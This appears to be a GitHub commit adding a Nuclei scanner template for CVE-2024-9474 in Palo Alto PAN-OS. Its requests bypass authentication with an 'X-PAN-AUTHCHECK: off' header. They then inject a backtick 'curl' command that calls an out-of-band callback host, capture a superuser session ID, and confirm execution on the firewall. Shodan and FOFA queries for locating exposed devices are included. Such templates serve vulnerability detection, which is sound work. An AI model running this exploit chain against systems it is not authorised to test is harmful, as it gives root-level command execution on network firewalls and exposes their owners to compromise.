Create CVE-2024-9474.yaml
Dhiyaneshwaran
GitHub
parent
c9248c078a
commit
a306bcf85a
|
|
@ -0,0 +1,83 @@
|
||||||
|
id: CVE-2024-9474
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PAN-OS Management Web Interface - Command Injection
|
||||||
|
author: watchTowr,iamnoooob,rootxharsh,pdresearch
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
|
||||||
|
Cloud NGFW and Prisma Access are not impacted by this vulnerability.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.2
|
||||||
|
cve-id: CVE-2024-9474
|
||||||
|
cwe-id: CWE-78
|
||||||
|
epss-score: 0.02252
|
||||||
|
epss-percentile: 0.89926
|
||||||
|
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
vendor: paloaltonetworks
|
||||||
|
product: pan-os
|
||||||
|
shodan-query:
|
||||||
|
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
|
||||||
|
- http.favicon.hash:"-631559155"
|
||||||
|
fofa-query: icon_hash="-631559155"
|
||||||
|
tags: cve,cve2024,panos,rce,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand: "{{to_lower(rand_text_alpha(5))}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
X-PAN-AUTHCHECK: off
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains_all(headers, "Expires: 0", "PHPSESSID=", "application/json")'
|
||||||
|
- 'contains(body, "0.0.0")'
|
||||||
|
condition: and
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
X-PAN-AUTHCHECK: off
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "@start@PHPSESSID="
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: phpsessid
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '@start@PHPSESSID=(.*?)@end@'
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /index.php/.js.map HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Cookie: PHPSESSID={{phpsessid}}
|
||||||
|
X-PAN-AUTHCHECK: off
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(interactsh_protocol, "dns")'
|
||||||
|
- 'contains(body, "panos")'
|
||||||
|
condition: and
|
||||||
Loading…
Reference in New Issue